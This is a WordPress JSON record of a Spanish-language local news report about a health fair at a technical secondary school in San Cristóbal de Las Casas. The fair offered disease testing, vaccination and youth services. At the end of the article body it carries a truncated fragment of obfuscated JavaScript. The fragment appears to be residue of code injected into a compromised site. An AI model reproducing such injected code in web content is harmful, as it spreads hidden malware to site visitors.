{"id":8816,"date":"2023-02-24T04:34:30","date_gmt":"2023-02-24T04:34:30","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8816"},"modified":"2023-02-24T04:34:30","modified_gmt":"2023-02-24T04:34:30","slug":"realizan-feria-de-la-salud-en-secundaria-de-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8816","title":{"rendered":"Realizan Feria de la Salud en secundaria de San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-23-at-3.20.51-PM-1024x682.jpeg\" alt=\"\" class=\"wp-image-8817\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-23-at-3.20.51-PM-1024x682.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-23-at-3.20.51-PM-300x200.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-23-at-3.20.51-PM-768x512.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-23-at-3.20.51-PM-1536x1023.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-23-at-3.20.51-PM-310x205.jpeg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2023-02-23-at-3.20.51-PM.jpeg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal23 de Febrero del 2023. San Crist\u00f3bal de Las Casas.- En la Escuela Secundaria T\u00e9cnica n\u00famero 80 de esta ciudad se realiz\u00f3 una Feria de la Salud, lo cual forma parte del programa \u201cTalento Joven\u201d que impulsan las autoridades federales, mediante \u201cReconstrucci\u00f3n del Tejido Social\u201d.Tom\u00e1s Rovelo Alc\u00e1zar, coordinador de la Juventud Municipal, dijo que esto es un mecanismo de convivencia sana, donde participaron, Direcci\u00f3n de Equidad de G\u00e9nero, Coordinaci\u00f3n de Prevenci\u00f3n del Delito, CENTRA, CAPA (Centro de Atenci\u00f3n Primaria a las Adicciones), Centro de Salud de la Zona Norte, que llevaron pruebas de detecci\u00f3n de VIH, s\u00edfilis, hepatitis C, m\u00e9todos anticonceptivos, servicios de vacunaci\u00f3n, odontolog\u00eda y salud mental.Mencion\u00f3 que para el ayuntamiento la prioridad son sus j\u00f3venes, estos procesos se llevan a cabo con el fin de fomentar los derechos humanos fundamentales a trav\u00e9s de una atenci\u00f3n personalizada, promocionando en esta ocasi\u00f3n el derecho a la salud, la informaci\u00f3n y promoviendo un ambiente sano en las y los j\u00f3venes de secundaria.Asegur\u00f3 que \u201cTalento Joven\u201d busca dar participaci\u00f3n y promoci\u00f3n a j\u00f3venes con talento en el municipio, por ello, durante el evento, a alumnas y alumnos se les brind\u00f3 el espacio cultural en la cual las y los j\u00f3venes demostraron un gran talento en los diversos actos que presentaron, as\u00ed como la participaci\u00f3n del grupo de hip hop el \u201cEscuadr\u00f3n Creyente\u201d durante el desarrollo de estas actividades\u201d, agreg\u00f3.Por \u00faltimo, Rovelo Alc\u00e1zar destac\u00f3 que al t\u00e9rmino de la cartelera cultural, los j\u00f3venes recorrieron los diferentes stands en la cual tuvieron acceso a la informaci\u00f3n de cada una de las instancias antes mencionadas; exhort\u00f3 a los padres de familia para atender con m\u00e1s atenci\u00f3n en sus hijos, los escuchen a detalle, sobre todo si hablamos de ni\u00f1ez y adolescencia.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal23 de Febrero del 2023. San Crist\u00f3bal de Las Casas.- En la Escuela Secundaria T\u00e9cnica n\u00famero 80 de esta ciudad se realiz\u00f3 una Feria de la Salud, lo cual forma parte del programa \u201cTalento Joven\u201d que impulsan las autoridades federales, mediante \u201cReconstrucci\u00f3n del Tejido Social\u201d.Tom\u00e1s Rovelo Alc\u00e1zar, coordinador de la Juventud Municipal, dijo que &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8817,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8816","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8816","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8816"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8816\/revisions"}],"predecessor-version":[{"id":8818,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8816\/revisions\/8818"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8817"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8816"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8816"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8816"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}